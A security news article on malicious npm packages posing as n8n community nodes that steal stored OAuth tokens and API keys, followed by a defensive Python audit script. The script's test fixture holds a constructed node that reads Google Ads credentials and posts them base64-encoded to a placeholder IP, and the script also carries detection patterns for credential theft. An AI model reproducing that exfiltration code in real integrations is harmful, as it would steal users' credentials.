Threat actors were spotted weaponizing the n8n automation ecosystem this week, slipping malicious npm packages into its marketplace of community-maintained nodes.
The deceptive packages, disguised as legitimate integrations like Google Ads connectors, lured developers into connecting OAuth and API keys, enabling attackers to extract sensitive tokens and credentials through a seemingly routine workflow execution.
According to Endor Labs, which discovered the campaign, the attack represents a new escalation in supply chain threats. “To our knowledge, the n8n workflow automation platform has not been targeted before by supply chain attacks,” said Henrik Plate, lead researcher at Endor Labs. “It shows that attackers keep on targeting new ecosystems to spread malicious packages, maybe due to tightening controls in other ecosystems like npm.”
Endor Labs warned in a blog post that enterprises used to monitoring build systems for supply-chain abuse may miss this class of attack entirely, as it targets automation platforms that already sit deep inside business workflows. The activity follows a max-severity n8n vulnerability disclosure (CVE-2026-21858), though researchers have not established any connection between the incidents.
How the attack unpacks
The attack begins with the publication of a malicious npm package to the public registry. These packages pose as community nodes, the extensions that n8n users can install to expand automation capabilities. Once installed, the malicious node behaves like any other integration, presenting configuration screens and collecting credentials required for typical workflow tasks.
Behind the scenes, however, it executes code that decrypts stored OAuth tokens and API keys from n8n’s credential store and exfiltrates them to remote command-and-control (C2) servers controlled by the attackers.
The approach succeeds because n8n treats all installed nodes as trusted code. There’s no pre-publication review on npm, and installed nodes run with full access to the workflow environment. This means the nodes can read decrypted credentials, make arbitrary network requests, and interact with the host system just as legitimate nodes do.
“According to security researchers at data security company Cyera, there were more than 100,000 n8n servers vulnerable to CVE-2026-21858,” Endor researchers said in the post. “We do not know how many of those install npm packages as community nodes in their environments. Still, this number shows that the n8n ecosystem is active and thriving.”
Tips for reducing risks
Workflow automation platforms like n8n are widely adopted because they let teams link disparate systems without hand-coding every integration. But the community node ecosystem depends on npm packages and therefore inherits the supply chain risks that come with them.
To mitigate exposure, Endor Labs researchers recommended measures such as preferring built-in integrations over community nodes, auditing package metadata and source code before installation, monitoring outbound network activity from automation hosts, and using isolated service accounts with limited privileges wherever possible. Endor Labs published a list of indicators of compromise (IOCs), including package names, C2 infrastructure, and malicious files, to support detection efforts. “Even though the malicious packages we know have been disabled in the last few hours, the attacks may continue and evolve going forward,” Plate noted.
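As an added example in the spirit of the "audit package metadata and source code before installation" recommendation (not Endor Labs' detection logic or n8n's own tooling), the script below reviews an unpacked community node package and flags install-time lifecycle scripts, eval/base64 decoding, and files that read credentials via n8n's `getCredentials()` while referencing hosts outside the integration's expected API domain. The package name, file layout, and the 203.0.113.10 endpoint are constructed for the demo; the heuristics are assumptions a reviewer would tune, not a verdict.

```python
import json, re, tempfile
from pathlib import Path

# Hypothetical review heuristics for an unpacked n8n community node package
# (added example, not Endor Labs' detection logic or n8n's own tooling).
LIFECYCLE = ("preinstall", "install", "postinstall", "prepare")
CRED_API = re.compile(r"\bgetCredentials\s*\(")  # n8n's node-side credential read
OBFUSC = re.compile(r"\beval\s*\(|new\s+Function\s*\(|['\"]base64['\"]")
URL_HOST = re.compile(r"https?://([A-Za-z0-9.\-]+)")

def audit_node_package(root: Path, expected_hosts: tuple[str, ...]) -> list[str]:
    # expected_hosts: API domains this integration legitimately talks to
    findings = []
    pkg = json.loads((root / "package.json").read_text())
    for hook in LIFECYCLE:  # code that runs at npm install time, before any workflow
        if hook in pkg.get("scripts", {}):
            findings.append(f"lifecycle script {hook!r}: {pkg['scripts'][hook]}")
    if not pkg.get("n8n", {}).get("nodes"):  # n8n node packages declare their nodes here
        findings.append("package.json declares no n8n.nodes entries")
    for js in sorted(root.rglob("*.js")):
        src, rel = js.read_text(errors="replace"), js.relative_to(root).as_posix()
        if OBFUSC.search(src):
            findings.append(f"{rel}: eval/Function/base64 decoding present")
        hosts = set(URL_HOST.findall(src))
        odd = sorted(h for h in hosts
                     if not any(h == e or h.endswith("." + e) for e in expected_hosts))
        if odd and CRED_API.search(src):  # credentials read next to unexpected destinations
            findings.append(f"{rel}: reads credentials and references {', '.join(odd)}")
    return findings

SAMPLE_NODE = """const axios = require('axios');
async function execute() {
  const creds = await this.getCredentials('googleAdsOAuth2Api');
  await axios.post('http://203.0.113.10/collect',  // constructed placeholder, TEST-NET-3
    Buffer.from(JSON.stringify(creds)).toString('base64'));
  return axios.get('https://googleads.googleapis.com/v17/customers');
}
module.exports = { execute };
"""

def run_demo() -> list[str]:
    # Writes a constructed fake "Google Ads" node package to a temp dir and audits it.
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "dist" / "nodes").mkdir(parents=True)
        (root / "package.json").write_text(json.dumps({"name": "n8n-nodes-google-ads-example",
            "scripts": {"postinstall": "node dist/setup.js"},  # constructed, not a real package
            "n8n": {"n8nNodesApiVersion": 1, "nodes": ["dist/nodes/GoogleAds.node.js"]}}))
        (root / "dist" / "nodes" / "GoogleAds.node.js").write_text(SAMPLE_NODE)
        return audit_node_package(root, expected_hosts=("googleapis.com",))
```

Against the constructed sample, `run_demo()` returns three findings: the postinstall hook, the base64 encoding, and a credential read alongside the raw-IP destination that a Google Ads connector has no reason to contact.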